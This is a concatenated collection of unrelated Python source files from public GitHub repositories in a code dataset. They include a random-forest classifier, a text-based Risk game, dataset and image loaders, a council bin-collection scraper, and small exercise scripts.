children\n child_left_entropy = _calculate_entropy(fc_has_vote, sc_has_vote)\n child_right_entropy = _calculate_entropy(fc_has_not_vote, sc_has_not_vote)\n\n # calculate proportion of votes in left and right children\n child_left_prop = (fc_has_vote + sc_has_vote) / parent_votes\n child_right_prop = (fc_has_not_vote + sc_has_not_vote) / parent_votes\n\n # calculate overall child entropy and information gain\n child_entropy = child_left_prop * child_left_entropy + child_right_prop * child_right_entropy\n information_gain = parent_entropy - child_entropy\n\n # compare with current best information gain\n if information_gain > best_information_feature[1]:\n best_information_feature = (feature_vote_count, information_gain)\n\n # prepare return data as feature and votes tuple:\n # ((feature_name, feature_index), (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n feature_index = best_information_feature[0][0]\n feature_name = classifier_features[feature_index]\n fc_has_vote = best_information_feature[0][1][0]\n sc_has_vote = best_information_feature[0][1][1]\n fc_has_not_vote = best_information_feature[0][2][0]\n sc_has_not_vote = best_information_feature[0][2][1]\n return_data = ((feature_name, feature_index), (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n\n return return_data\n\n # recursive function for building a random decision tree based on the provided cut of training data\n def _rec_build_random_tree(training_data_cut, rec_count):\n # increase recursion count by 1\n rec_count += 1\n\n # find the feature to split the data that provides greatest information gain from a random sample\n # returns tuple ((feature_name, feature_index), (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n feature_and_votes = _find_best_sampled_feature(training_data_cut)\n\n # if training data falls below a preset threshold or the vote is unanimous build a Leaf node;\n # otherwise split data on feature and build a Tree node; also enforce a recursion limit\n fc_has_vote = feature_and_votes[1][0]\n sc_has_vote = feature_and_votes[1][1]\n fc_has_not_vote = feature_and_votes[2][0]\n sc_has_not_vote = feature_and_votes[2][1]\n\n # length of training data cut\n cut_length = len(training_data_cut)\n\n # build left (has feature) branch\n if cut_length < _leaf_threshold or fc_has_vote == 0 or sc_has_vote == 0 or rec_count > _rec_limit:\n # build Leaf based on votes\n left_branch = DecisionTree.Leaf((fc_has_vote, sc_has_vote))\n else:\n # split out and build Tree\n has_feature_data = []\n for tree_row in training_data_cut:\n # add 2 to feature index to skip RECORD and CLASS columns\n feature_index = feature_and_votes[0][1] + 2\n if tree_row[feature_index]:\n has_feature_data.append(tree_row)\n\n # recurse into the left branch building the tree of data that has feature\n left_branch = _rec_build_random_tree(has_feature_data, rec_count)\n\n # build right (has not feature) branch\n if cut_length < _leaf_threshold or fc_has_not_vote == 0 or sc_has_not_vote == 0 or rec_count > _rec_limit:\n # build Leaf based on votes\n right_branch = DecisionTree.Leaf((fc_has_not_vote, sc_has_not_vote))\n else:\n # split out and build Tree\n has_not_feature_data = []\n for tree_row in training_data_cut:\n # add 2 to feature index to skip RECORD and CLASS columns\n feature_index = feature_and_votes[0][1] + 2\n if not tree_row[feature_index]:\n has_not_feature_data.append(tree_row)\n\n # recurse into the right branch building the tree of data without feature\n right_branch = _rec_build_random_tree(has_not_feature_data, rec_count)\n\n # build tree with splitting feature name and index, and the left and right branches\n feature_name_index = feature_and_votes[0]\n random_tree = DecisionTree.Tree(feature_name_index, left_branch, right_branch)\n\n return random_tree\n\n # ----------------------------------\n # MAIN CODE for train function\n # ----------------------------------\n\n first_class = parsed_training_data[1][1]\n second_class = \"\"\n\n # build list of classifier's feature names\n classifier_features = []\n for feature in parsed_training_data[0][2:]:\n classifier_features.append(feature)\n\n # find second class; also count the occurrence of each class and add to the class counts dictionary\n class_counts = {}\n for row in parsed_training_data[1:]:\n class_name = row[1]\n if class_name in class_counts:\n class_counts[class_name] += 1\n else:\n second_class = class_name\n class_counts[class_name] = 1\n\n # build n random decision trees, where n is the length of the data, up to the max\n classifier_details = []\n training_data_length = len(parsed_training_data[1:])\n tree_count = training_data_length if training_data_length < _max_trees else _max_trees\n for i in range(0, tree_count):\n\n # debug counter\n debug.run_counter(\"rf.train\", 10)\n\n # bootstrap training data, taking random sample of rows (with replacement) equal to the length of training data\n bootstrap_data = []\n for k in range(0, training_data_length):\n row_index = random.randint(0, (training_data_length - 1)) + 1\n bootstrap_data.append(parsed_training_data[row_index])\n\n # build a random decision tree by passing bootstrapped data (without headers) and list of classifier features\n # to recursive build function\n random_decision_tree = _rec_build_random_tree(bootstrap_data, 0)\n\n # add tree to classifier details\n classifier_details.append(random_decision_tree)\n\n # create new instance of Classifier and populate with classifier details\n class_names_counts = ((first_class, class_counts[first_class]), (second_class, class_counts[second_class]))\n classifier = Classifier.Classifier(\"rf\", class_names_counts, classifier_features)\n for detail in classifier_details:\n classifier.add_classifier_detail(detail)\n\n # reset the debug counter\n debug.reset_counter(\"rf.train\")\n\n return classifier\n\n\n# public interface function to classify data; expects 2D list with binary features as input and a classifier object\ndef classify(parsed_test_data, classifier):\n\n # HELPER FUNCTION for classify function\n # -----------------------------------\n\n # recursively run through the given decision tree until reaching a terminal Leaf node; current_row is expected\n # without RECORD column (meaning that its feature index matches the classifier's feature list)\n def _rec_run_decision_tree(tree, current_row):\n\n # check node type of tree; if Tree recurse further, if Leaf return votes\n if tree.get_node_type() == \"tree\":\n # get the index of the Tree node's splitting feature\n feature_and_index = tree.get_feature_and_index()\n index = feature_and_index[1]\n\n # if the row has the feature, recurse left (has branch), otherwise recurse right (has not branch)\n if current_row[index]:\n left_branch = tree.get_left()\n return _rec_run_decision_tree(left_branch, current_row)\n else:\n right_branch = tree.get_right()\n return _rec_run_decision_tree(right_branch, current_row)\n else:\n leaf_votes = tree.get_votes()\n return leaf_votes\n\n # ----------------------------------\n # MAIN CODE for train function\n # ----------------------------------\n\n # get class names and counts from classifier\n fc_name = classifier.get_class_names_counts()[0][0]\n fc_count = classifier.get_class_names_counts()[0][1]\n sc_name = classifier.get_class_names_counts()[1][0]\n sc_count = classifier.get_class_names_counts()[1][1]\n\n # build results by running each row through the classifier's decision trees\n results = []\n classifier_details = classifier.get_classifier_details()\n for row in parsed_test_data[1:]:\n\n # debug counter\n debug.run_counter(\"rf.classify\", 10)\n\n # variables to hold the total first and second class votes across all decision trees\n fc_total_votes = 0\n sc_total_votes = 0\n\n # run the row through each decision tree in the classifier\n for detail in classifier_details:\n\n # get tuple of first and second class votes from detail decision tree\n fc_and_sc_votes = _rec_run_decision_tree(detail, row[1:])\n\n # pull out class votes and add votes to total tallies\n fc_vote = fc_and_sc_votes[0]\n sc_vote = fc_and_sc_votes[1]\n fc_total_votes += fc_vote\n sc_total_votes += sc_vote\n\n # calculate more probable class (the one that received more total votes)\n # if votes are equal, assign the overall most probable class\n record = row[0]\n if fc_total_votes > sc_total_votes:\n results.append((record, fc_name))\n elif sc_total_votes > fc_total_votes:\n results.append((record, sc_name))\n else:\n if fc_count > sc_count:\n results.append((record, fc_name))\n else:\n results.append((record, sc_name))\n\n # reset the debug counter\n debug.reset_counter(\"rf.classify\")\n\n return results","repo_name":"glanton/robocritic","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":14399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22635874751","text":"import os\nimport random\n\nNR_OF_PLAYERS = 3\nADDED_ARMIES_PER_TURN = 10\n\nclass Manager():\n '''\n Manages the game. Takes turns and communicates with the active player\n '''\n def __init__(self, nrOfPlayers):\n self.nrOfPlayers = nrOfPlayers\n self.players = self.init_players(nrOfPlayers)\n self.activePlayer = self.players[0]\n\n def run(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\n\"\\n-----------------------------------\\n\\\n Active player: {}\\\n\\n-----------------------------------\\n\\\n \".format(self.activePlayer.id))\n \n self.activePlayer.run()\n self.next_player()\n\n def next_player(self):\n playerNr = self.activePlayer.id\n if self.activePlayer.id >= len(self.players) - 1:\n self.activePlayer = self.players[0]\n else:\n self.activePlayer = self.players[playerNr + 1]\n\n @classmethod\n def init_players(self, NrOfPlayers):\n Players = []\n for idx in range(NrOfPlayers):\n Players.append(Player(idx))\n return Players\n\nclass Player():\n '''\n Keeps track of a player's info, and what it should do in a turn\n '''\n def __init__(self, id):\n self.id = id\n\n def run(self):\n Finished = False\n self.ask_info()\n while not Finished:\n option = self.ask_option()\n if option == 1:\n self.ask_reinforce()\n Finished = True\n elif option == 2: \n frm, to, confirmedAttack = self.ask_attack_fromto()\n if confirmedAttack:\n Finished = self.battle(frm, to)\n self.ask_info()\n input(\"----- End of turn. Press a key to continue. -----\")\n\n def ask_option(self):\n optionValid = False\n while not optionValid:\n try:\n userInput = int(input(\\\n\"Choose an option:\\\n\\n 1) Reinforce armies\\\n\\n 2) Attack\\\n\\n\\t - \"))\\\n\n optionValid = True\n except Exception:\n print(\"no valid number given!\")\n pass\n return userInput\n \n def battle(self, frm, to):\n validAttackAmount = False\n availableArmies = Region.get_vertex_armies(frm) - 1\n while not validAttackAmount:\n amountAttack = int(input(\"How many armies to attack {}\\n\\t\".format(to)))\n if amountAttack > availableArmies or amountAttack <= 0:\n print(\"Invalid amount of armies to attack with. \")\n else:\n validAttackAmount = True\n if validAttackAmount:\n win = bool(random.randint(0,1))\n if win: #todo\n Region.set_vertex_armies(to, amountAttack)\n Region.set_vertex_owner(to, self.id)\n print(\"Player {} has won {}, {} armies placed. \".format(self.id, to, amountAttack))\n else:\n print(\"lost battle... \")\n Finished = False\n print(\"battling\")\n Finished = True\n return Finished\n\n def ask_info(self): \n print(\"\\n\") \n for city in self.owned_cities():\n cityObj = Region.get_vertex(city)\n print(\"[Info] {} ==> {} armies\".format(cityObj.name, cityObj.armies))\n print(\"\\n\")\n\n def ask_city_to_reinforce(self):\n validCity = False\n while not validCity:\n try:\n inputCity = input(\"[Q] Which city to reinforce? Choose from: {}\\n\\t\".format(self.owned_cities()))\n if inputCity in self.owned_cities():\n validCity = True\n else:\n print(\"[Error] Given city not owned by player\")\n\n except Exception:\n print(\"[Error] No valid city given\")\n pass\n return inputCity\n \n def ask_how_many_reinforcements(self, city, armiesLeftToAdd):\n validArmies = False\n while not validArmies:\n try:\n armiesToAdd = int(input(\"[Q] How many armies to add to {}?\\n\\t\".format(city)))\n if armiesToAdd == 0:\n print(\"Cancelled reinforcing\")\n break\n elif armiesToAdd <= armiesLeftToAdd and armiesToAdd >= 0:\n cityObj = Region.get_vertex(city)\n cityObj.add_armies(armiesToAdd)\n print(\"[Info] Successful. Armies now in {}: \".format(city), cityObj.armies)\n validArmies = True\n else:\n print(\"[Error] Invalid number of armies given. \")\n except Exception:\n print(\"[Error] Invalid input\")\n return armiesToAdd\n\n def ask_reinforce(self):\n armies_left_to_add = ADDED_ARMIES_PER_TURN\n while armies_left_to_add != 0:\n print(\"[Info] Reinforcements left: {}\".format(armies_left_to_add))\n city = self.ask_city_to_reinforce()\n armies_left_to_add -= self.ask_how_many_reinforcements(city, armies_left_to_add)\n \n return 0 #\n\n def ask_attack_fromto(self):\n print(\"Owned cities: \", self.owned_cities()) \n validFrom = False\n validTo = False\n confirmAttack = False\n frm = ''\n to = ''\n try:\n while not validFrom:\n frm = input(\"From which city do you want to attack: \\n\\t--> \")\n if frm == '':\n break\n elif Region.get_vertex_owner(frm) != self.id:\n print(\"[Invalid] Attempting to attack from city that is not owned by you!\") \n elif Region.get_vertex_armies(frm) <= 1:\n print(\"[Invalid] Not enough armies available to attack with. \")\n else:\n validFrom = True\n while (not validTo) and validFrom:\n print(\"Attackable cities from {}: \".format(frm), self.get_attackable_from(frm))\n to = input(\"Which city do you want to attack: \\n\\t--> \")\n if to == '':\n break \n elif Region.get_vertex_owner(to) == self.id:\n print(\"[Invalid] Attempting to attack city that is owned by you!\")\n elif to not in Region.get_vertex_list(frm):\n print(\"[Invalid] Attempting to attack city that is not adjacent\")\n else:\n validTo = True\n print(\"Player {} attacks {} from {}\".format(self.id, to, frm))\n confirmAttack = True\n\n except Exception:\n print(\"no valid city given!\")\n pass\n return frm, to, confirmAttack\n\n def get_attackable_from(self, frm):\n attackable = []\n for city in Region.get_vertex_list(frm):\n if Region.get_vertex_owner(city) != self.id:\n attackable.append(city)\n return attackable\n\n def check_attack_combi(self, frm, to):\n if to not in Region.get_vertex_list(frm):\n print(\"Attempting to attack city that is not adjacent\")\n return False\n else:\n return True\n\n def owned_cities(self):\n return Region.get_players_vertices(self.id)\n\nclass Vertex:\n def __init__(self, name, ownedBy, armies):\n self.name = name\n self.ownedBy = ownedBy\n self.adjacent = {}\n self.armies = armies\n def __str__(self):\n return str(self.name) + ' adjacent: ' + str([x.name for x in self.adjacent])\n\n def add_neighbor(self, neighbor):\n self.adjacent[neighbor] = True\n\n def get_connections(self):\n return self.adjacent.keys() \n\n def get_name(self):\n return self.name\n\n def get_weight(self, neighbor):\n return self.adjacent[neighbor]\n \n def add_armies(self, armiesToAdd):\n self.armies += armiesToAdd\n\n\nclass Graph:\n def __init__(self):\n self.vert_dict = {}\n self.num_vertices = 0\n\n def __iter__(self):\n return iter(self.vert_dict.values())\n\n def add_vertex(self, node, ownedBy, armies):\n self.num_vertices = self.num_vertices + 1\n new_vertex = Vertex(node, ownedBy, armies)\n self.vert_dict[node] = new_vertex\n return new_vertex\n\n def get_vertex(self, name):\n if name in self.vert_dict:\n return self.vert_dict[name]\n else:\n return None\n \n def get_vertex_list(self, name):\n if name in self.vert_dict:\n return [x.name for x in self.vert_dict[name].adjacent]\n\n def get_vertex_owner(self, name):\n if name in self.vert_dict:\n return self.vert_dict[name].ownedBy \n else:\n return None\n\n def get_vertex_armies(self, name):\n if name in self.vert_dict:\n return self.vert_dict[name].armies\n else:\n return None\n\n def set_vertex_armies(self, name, value):\n if name in self.vert_dict:\n self.vert_dict[name].armies = value\n \n def set_vertex_owner(self, name, player):\n if name in self.vert_dict:\n self.vert_dict[name].ownedBy = player\n\n def get_players_vertices(self, player):\n playersVertices = []\n for name in self.vert_dict:\n vertex = self.vert_dict[name]\n if vertex.ownedBy == player:\n playersVertices.append(name)\n return playersVertices\n\n def add_edge(self, frm, to):\n self.vert_dict[frm].add_neighbor(self.vert_dict[to])\n self.vert_dict[to].add_neighbor(self.vert_dict[frm])\n\n def get_vertices(self):\n return self.vert_dict.keys()\n\nRegion = Graph()\n\nRegion.add_vertex('Groningen', 0, 5) \nRegion.add_vertex('Delfzijl', 0, 5) \nRegion.add_vertex('Leeuwarden', 1, 10)\nRegion.add_vertex('Assen', 2, 10)\n\nRegion.add_edge('Groningen', 'Delfzijl')\nRegion.add_edge('Groningen', 'Leeuwarden')\nRegion.add_edge('Groningen', 'Assen')\n\nmanager = Manager(NR_OF_PLAYERS)\nwhile True:\n manager.run()\n","repo_name":"jeffreyhingstman/Risk","sub_path":"Risk.py","file_name":"Risk.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35058649835","text":"class Solution:\n # @param A : integer\n # @return an integer\n def trailingZeroes(self, A):\n sum = 0\n for i in range(1, A):\n z = self.power(5,i )\n if A // z is not 0:\n sum += A//z\n return sum\n\n def power(self, x, y):\n if y == 0:\n return 1\n z = 0 if y == -1 else y//2\n temp = self.power(x,z)\n if y % 2 == 0:\n return temp*temp\n else:\n if y > 0:\n return x*temp*temp\n else:\n return (temp*temp)/x\n\n\n\nsol = Solution()\nprint(sol.trailingZeroes(2))","repo_name":"koushikruidas/interviewbit","sub_path":"math/trailling_zeros_in_factorial.py","file_name":"trailling_zeros_in_factorial.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18101917507","text":"import os\nimport urllib.request as request_file\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\nfrom urllib.parse import urlparse\nfrom zipfile import ZipFile\n\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom PIL import Image\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\n# domain mapped session for reuse\n_requests_sessions = {}\n\n\ndef _get_retry_session(url):\n domain = urlparse(url.lower()).netloc\n if domain in _requests_sessions:\n return _requests_sessions[domain]\n\n session = requests.Session()\n retries = Retry(\n total=5, backoff_factor=1, status_forcelist=[500, 502, 503, 504]\n )\n session.mount(\"http://\", HTTPAdapter(max_retries=retries))\n session.mount(\"https://\", HTTPAdapter(max_retries=retries))\n _requests_sessions[domain] = session\n\n return session\n\n\ndef get_image_from_path(image_path, image_mode):\n \"\"\"Get image from path.\n\n :param image_path: The path to the image.\n :type image_path: str\n :param image_mode: The mode to open the image in.\n See pillow documentation for all modes:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html\n :type image_mode: str\n :return: The image as a numpy array.\n :rtype: numpy.ndarray\n \"\"\"\n image_open_pointer = image_path\n if image_path.startswith(\"http://\") or image_path.startswith(\"https://\"):\n response = _get_retry_session(image_path).get(image_path)\n image_open_pointer = BytesIO(response.content)\n with Image.open(image_open_pointer) as im:\n if image_mode is not None:\n im = im.convert(image_mode)\n image_array = np.asarray(im)\n return image_array\n\n\ndef convert_images(dataset, image_mode):\n \"\"\"Converts the images to the format required by the model.\n\n If the images are base64 encoded, they are decoded and converted to\n numpy arrays. If the images are already numpy arrays, they are\n returned as is.\n\n :param dataset: The dataset to convert.\n :type dataset: numpy.ndarray\n :param image_mode: The mode to open the image in.\n See pillow documentation for all modes:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html\n :type image_mode: str\n :return: The converted dataset.\n :rtype: numpy.ndarray\n \"\"\"\n if len(dataset) > 0 and isinstance(dataset[0], str):\n try:\n dataset = np.array([get_image_from_path(\n x, image_mode) for x in dataset])\n except ValueError:\n # if images of different sizes, try to convert one by one\n jagged = np.empty(len(dataset), dtype=object)\n for i, x in enumerate(dataset):\n jagged[i] = get_image_from_path(x, image_mode)\n dataset = jagged\n return dataset\n\n\ndef get_images(dataset, image_mode, transformations=None):\n \"\"\"Get the images from the dataset.\n\n If transformations are provided as a callable, the images\n are transformed. If transformations are provided as a string,\n the images are retrieved from that column name in the test dataset.\n\n :param dataset: The dataset to get the images from.\n :type dataset: numpy.ndarray\n :param image_mode: The mode to open the image in.\n See pillow documentation for all modes:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html\n :type image_mode: str\n :param transformations: The transformations to apply to the images.\n :type transformations: torchvision.transforms\n :return: The images.\n :rtype: numpy.ndarray\n \"\"\"\n IMAGE = \"image\"\n IMAGE_URL = \"image_url\"\n\n column_names = dataset.columns\n is_transformations_str = isinstance(transformations, str)\n if is_transformations_str:\n images = dataset[transformations]\n else:\n if IMAGE in column_names:\n images = dataset[IMAGE]\n elif IMAGE_URL in column_names:\n images = dataset[IMAGE_URL]\n else:\n raise ValueError('No image column found in test data')\n\n images = np.array(images.tolist())\n converted_images = convert_images(images, image_mode)\n\n if not is_transformations_str and transformations is not None:\n converted_images = transformations(converted_images)\n\n return converted_images\n\n\ndef load_fridge_object_detection_dataset_labels():\n \"\"\"Loads the labels for the fridge object detection dataset.\n\n return: list of labels\n rtype: list\n \"\"\"\n\n src_images = \"./data/odFridgeObjects/\"\n\n # Path to the annotations\n annotations_folder = os.path.join(src_images, \"annotations\")\n\n labels = []\n label_dict = {'can': 1, 'carton': 2, 'milk_bottle': 3, 'water_bottle': 4}\n\n # Read each annotation\n for _, filename in enumerate(os.listdir(annotations_folder)):\n if filename.endswith(\".xml\"):\n print(\"Parsing \" + os.path.join(src_images, filename))\n\n root = ET.parse(\n os.path.join(annotations_folder, filename)\n ).getroot()\n\n # use if needed\n # width = int(root.find(\"size/width\").text)\n # height = int(root.find(\"size/height\").text)\n\n image_labels = []\n for object in root.findall(\"object\"):\n name = object.find(\"name\").text\n xmin = object.find(\"bndbox/xmin\").text\n ymin = object.find(\"bndbox/ymin\").text\n xmax = object.find(\"bndbox/xmax\").text\n ymax = object.find(\"bndbox/ymax\").text\n isCrowd = int(object.find(\"difficult\").text)\n image_labels.append([\n label_dict[name], # label\n float(xmin), # topX. To normalize, divide by width.\n float(ymin), # topY. To normalize, divide by height.\n float(xmax), # bottomX. To normalize, divide by width\n float(ymax), # bottomY. To normalize, divide by height\n int(isCrowd)\n ])\n labels.append(image_labels)\n\n return labels\n\n\ndef load_fridge_object_detection_dataset():\n \"\"\"Loads the fridge object detection dataset.\n\n return: pandas dataframe with image paths and labels\n rtype: pd.DataFrame\n \"\"\"\n # create data folder if it doesnt exist.\n os.makedirs(\"data\", exist_ok=True)\n\n # download data\n download_url = (\"https://cvbp-secondary.z19.web.core.windows.net/\" +\n \"datasets/object_detection/odFridgeObjects.zip\")\n data_file = \"./odFridgeObjects.zip\"\n request_file.urlretrieve(download_url, filename=data_file)\n\n # extract files\n with ZipFile(data_file, \"r\") as zip:\n print(\"extracting files...\")\n zip.extractall(path=\"./data\")\n print(\"done\")\n # delete zip file\n os.remove(data_file)\n\n labels = load_fridge_object_detection_dataset_labels()\n\n # get all file names into a pandas dataframe with the labels\n data = pd.DataFrame(columns=[\"image\", \"label\"])\n for i, file in enumerate(os.listdir(\"./data/odFridgeObjects/\" + \"images\")):\n image_path = \"./data/odFridgeObjects/\" + \"images\" + \"/\" + file\n data = data.append({\"image\": image_path,\n \"label\": labels[i]}, # folder\n ignore_index=True)\n\n return data\n","repo_name":"microsoft/responsible-ai-toolbox","sub_path":"rai_test_utils/rai_test_utils/datasets/vision/object_detection_data_utils.py","file_name":"object_detection_data_utils.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"37"} +{"seq_id":"74146151468","text":"# Highly based on milton_keynes_gov_uk.py\n\nfrom datetime import datetime\nfrom time import time_ns\n\nimport requests\nfrom waste_collection_schedule import Collection # type: ignore[attr-defined]\n\nTITLE = \"North Yorkshire Council - Hambleton\"\nDESCRIPTION = \"Source for North Yorkshire Council - Hambleton.\"\nURL = \"https://northyorks.gov.uk\"\nTEST_CASES = {\n \"010070735142\": {\"uprn\": \"010070735142\"},\n \"100050360667\": {\"uprn\": \"100050360667\"},\n \"010070732324, leading 0 missing\": {\"uprn\": 10070732324},\n}\n\n\nICON_MAP = {\n \"REFUSE\": \"mdi:trash-can\",\n \"GARDEN WASTE\": \"mdi:leaf\",\n \"RECYCLING\": \"mdi:recycle\",\n}\n\nHEADERS = {\n \"user-agent\": \"Mozilla/5.0\",\n}\n\nAPI_URL = \"https://hambletondc-self.achieveservice.com/service/Bin_collection_finder\"\n\n\nclass Source:\n def __init__(self, uprn: str | int):\n self._uprn: str = str(uprn).zfill(12)\n\n def fetch(self):\n s = requests.Session()\n\n # Set up session\n timestamp = time_ns() // 1_000_000 # epoch time in milliseconds\n s.get(\n \"https://hambletondc-self.achieveservice.com/apibroker/domain/hambletondc-self.achieveservice.com\",\n params={\n \"_\": timestamp,\n },\n headers=HEADERS,\n )\n\n # This request gets the session ID\n sid_request = s.get(\n \"https://hambletondc-self.achieveservice.com/authapi/isauthenticated\",\n params={\n \"uri\": \"https://hambletondc-self.achieveservice.com/service/Bin_collection_finder\",\n \"hostname\": \"hambletondc-self.achieveservice.com\",\n \"withCredentials\": \"true\",\n },\n )\n sid_data = sid_request.json()\n sid = sid_data[\"auth-session\"]\n\n # This request retrieves the schedule\n timestamp = time_ns() // 1_000_000 # epoch time in milliseconds\n payload = {\n \"formValues\": {\n \"Address search\": {\n \"pccUPRN\": {\"value\": self._uprn},\n \"selectedUPRN\": {\"value\": self._uprn},\n }\n }\n }\n schedule_request = s.post(\n \"https://hambletondc-self.achieveservice.com/apibroker/runLookup\",\n headers=HEADERS,\n params={\n \"id\": \"62b1d2c960a47\",\n \"repeat_against\": \"\",\n \"noRetry\": \"true\",\n \"getOnlyTokens\": \"undefined\",\n \"log_id\": \"\",\n \"app_name\": \"AF-Renderer::Self\",\n \"_\": str(timestamp),\n \"sid\": str(sid),\n },\n json=payload,\n )\n rowdata = schedule_request.json()[\"integration\"][\"transformed\"][\"rows_data\"]\n\n # Extract bin types and next collection dates\n entries = []\n for item in rowdata.values():\n bin_type = item[\"Collection_Type\"]\n date_str = item[\"Collection_Date\"]\n date = datetime.strptime(date_str, \"%Y-%m-%d\").date()\n icon = ICON_MAP.get(bin_type.upper().replace(\"COLLECTION\", \"\"))\n entries.append(\n Collection(t=bin_type, date=date, icon=icon),\n )\n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/northyorks_hambleton_gov_uk.py","file_name":"northyorks_hambleton_gov_uk.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"40735604405","text":"import gen\r\n\r\ntba = gen.setup()\r\n\r\ndist = 'chs'\r\nyear = 2019\r\n\r\ndistKey = str(year)+dist\r\ndistEvents = tba.district_events(distKey, False, True)\r\n\r\noodPlays = []\r\nfor team in tba.district_teams(distKey, False, True):\r\n print(\"Processing team \" + team)\r\n\r\n for event in tba.team_events(team, year, False):\r\n if event['key'] not in distEvents:\r\n teamModel = {'Team': team, 'Event': event['event_code'], 'Type': event['event_type']}\r\n oodPlays.append(teamModel)\r\n\r\ngen.listOfDictToCSV(distKey +\"_ood\", oodPlays, ['Team', 'Event', 'Type'])","repo_name":"PChild/frc-data-scripts","sub_path":"externalPlay.py","file_name":"externalPlay.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26657309015","text":"import sys\n\n\nimport os\nfrom enum import Enum\nimport pandas as pd\n\nimport time\n\nclass Config:\n RESOURCES_DIR ='resource'\n DATA_DIR = 'data'\n QTDB_RECORD_DIR = 'data/' + 'qtdb/physionet.org/files/qtdb/1.0.0/'\n LUDB_RECORD_DIR = 'data/' + 'physionet.org/files/ludb/1.0.1/'\n\n \n\n P_H = 1\n QRS_H = 3\n T_H = 2\n \n\n def __init__(self):\n ####signal####\n self.dataset = 'ludb'\n self.wave_len = 280\n self.fc = 250\n ####data####\n self.seed = 1\n self.data = None\n self.batch_size = 32\n self.epochs = 30\n self.lr = 1e-3\n self.kernel_size = 9\n self.conv_channels = 32\n self.train_verbose = True\n \n ####filename####\n self.refresh()\n\n \n \n def print(self):\n print('filename:', self.fname_data)\n \n def refresh(self):\n\n self.fname_data = Config.DATA_DIR+ '/' + dataset + '.pkl'\n self.fname_model = Config.RESOURCES_DIR + '/'+ dataset + '_model.h5'\n self.fname_history = Config.RESOURCES_DIR + '/l'+ dataset+ '_history.pkl'\n\n \n\n\n \n \n \n","repo_name":"zhenqinchen/ECG-Delineation","sub_path":"utils/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"28072308200","text":"import interface as i\n\ndef se_arq_existe(arq):\n try:\n arquivo = open(arq, 'rt')\n except:\n arquivo = open(arq, 'wt+')\n print(f'O arquivo {arq} foi criado')\n finally:\n arquivo.close()\n\n\ndef ler_arquivo(arq):\n try:\n a = open(arq, 'rt')\n except:\n print('Erro ao ler o arquivo')\n else:\n i.cabecalho('PESSOAS CADASTRADAS')\n for linha in a:\n dado = linha.split(';')\n dado[1] = dado[1].replace('\\n','')\n print(f'{dado[0]:<30}{dado[1]:>3} anos')\n finally:\n a.close()\n\n\ndef cadastrar_pessoa(arq, nome='desconhecido', idade=0):\n try:\n a = open(arq, 'at')\n except:\n print('Houve um erro na abertura do arquivo.')\n else:\n try:\n a.write(f'{nome};{idade}\\n')\n except:\n print('Houve um erro ao adicionar a pessoa.')\n else:\n print(f'{nome} adicionado com sucesso.')\n finally:\n a.close()\n","repo_name":"malucaires/cursoemvideo_python","sub_path":"mundo_3/ex115/arquivo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32619678038","text":"import numpy as np\nfrom parameter import *\n'''\nx_min=0\ny_min=0\nz_min=0\nx_max=130\ny_max=220\nz_max=30\nx_width=1\ny_width=1\nz_width=1\nnel_x=x_max/x_width\nnel_y=y_max/y_width\nnel_z=z_max/z_width\n'''\nBr_El=np.loadtxt('NodeOfBrelement_whole.txt')##########branch element\nnode=np.loadtxt('CoorOfBrelement_whole.txt')############branch node\n\n#if it is 1, it is terminal br, if it is zero it is not\nT_Br=np.ones((len(Br_El),1))\nterm_block = np.zeros((nel_x*nel_y*nel_z,1))\nT_ELIN= np.zeros((nel_x*nel_y*nel_z,1))\n\n\n\nfor i in range(0, len(Br_El)):\n for j in range(0,len(Br_El)): \n \n if Br_El[j,0] == Br_El[i,1]:\n T_Br[i] = 0\n \n \nTerminal_El_num=np.array(np.where(T_Br[:,0]==1))### this is minus one value\n\n\nf=open(\"Terminal_El_num.txt\",'w')\n\nfor P in range(0,len(Terminal_El_num[0])):\n \n f.write(\"%d\\n\" %(Terminal_El_num[0,P] ))\nf.close()\nraise SystemExit\n\n#print Terminal_El_num [0,0]\n\n\nfor j in range(0,len(Terminal_El_num[0])):\n\n\n Endpoints = node[[Br_El[Terminal_El_num[0][j],1]-1]]\n #print (Endpoints[0,0])\n num_x = np.floor((Endpoints[0,0]-x_min)/x_width)+1;\n num_y = np.floor((Endpoints[0,1]-y_min)/y_width)+1;\n num_z = np.floor((Endpoints[0,2]-z_min)/z_width)+1;\n \n if num_x > nel_x:\n num_x = nel_x\n\n if num_y >= nel_y:\n num_y = nel_y\n \n if num_z >= nel_z:\n num_z = nel_z\n\n T_e = ((num_z-1)*nel_x*nel_y + (num_y-1)*nel_x + num_x)-1###############CHECK##########e is numbering of mesh\n term_block[T_e,0] = 1;# if 1, that block element contain terminal branch\n 